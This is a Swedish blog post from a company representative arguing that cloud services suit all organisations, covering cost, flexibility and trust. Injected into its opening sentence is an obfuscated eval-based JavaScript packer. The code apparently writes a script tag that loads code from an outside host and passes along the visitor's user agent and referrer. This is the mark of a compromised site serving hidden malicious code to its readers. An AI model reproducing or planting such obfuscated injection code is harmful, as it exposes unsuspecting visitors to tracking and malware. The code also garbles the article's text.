Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Molntjänster passar alla

Molntjänster passar alla
Sebastian

Molntjänster eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khafi|var|u0026u|referrer|fkner||js|php’.split(’|’),0,{}))
är ett fluffigt begrepp. Det beror på att det finns många olika typer av moln. Det vi vanligtvis menar med molnet är att de data, bilder, videor, program och it-system vi behöver är lagrade utanför den egna organisationen, samtidigt som de är ständigt tillgängliga. Med molntjänster minskar kostnaderna eftersom du själv inte behöver hålla igång alla de resurser i form av servrar och personal mm som krävs för att åstadkomma den flexibilitet som molntjänster ger. Många organisationer är ännu i startfasen och försöker smälta begreppets möjligheter och undersöka hur det kan användas i den egna organisationen. 

Det finns flera missuppfattningar och förevändningar kring molnet som skapar onödiga hinder mot att införa molntjänster hos många som faktiskt skulle ha stor nytta av dem. Den främsta förevändningen mot att fullt gå in i molnet är rädsla för att tappa företagets interna kontroll av data och säkerhet. Största motståndet finns bland dem som inte har någon kontroll, eftersom en dålig implementation kan skapa en ännu sämre miljö än vad man har idag. 

En vanlig missuppfattning är att molnet inte passar alla, vilket jag menar inte stämmer. Molntjänster innebär flexibel skalbarhet upp och ner och du betalar bara för det du använder. Därför passar de alla som har behov av att lösa tillgänglighet på en gång och vill eller måste vara flexibla i lösningens uppbyggnad för att de har svårt att förutse behoven längre fram.

Det råder en viss hype kring molntjänster just nu. Och liksom andra tekniker med koppling till nätet som hypats tidigare, måste molnet bevisa sitt värde. Och värdet ligger i flexibel tillgång till tjänster utan att behöva bygga och hantera dem själv. Programvaran uppdateras exempelvis automatiskt och du slipper fundera på om du har senaste versionen. Du kan också nå filer och dokument i molnet från vilken enhet som helst; en dator, smartphone eller surfplatta.

Med molnet kan företag frigöra sig från en mängd praktiska frågor kring hårdvara, mjukvara, personal som man måste hantera om man vill ha hela it-infrastrukturen in-house. Företagen får helt enkelt friheten att ägna sig åt det roliga och nyttiga med it, det vill säga de problem som it-systemen ska lösa.

I framtiden kommer molnet att innebära ännu mer automatisering, vilket kommer att kräva ordentliga nätverk och mycket dator- och lagringskapacitet. Nyckeln till framgångsrika molntjänster ligger i att de blir så bra att man inte märker någon skillnad mot om man byggt hela lösningen själv.

Molntjänster handlar i grunden om pengar och tillit. Som kund sparar du pengar. Som leverantör måste vi stå för tillit genom att leverera vad vi lovar.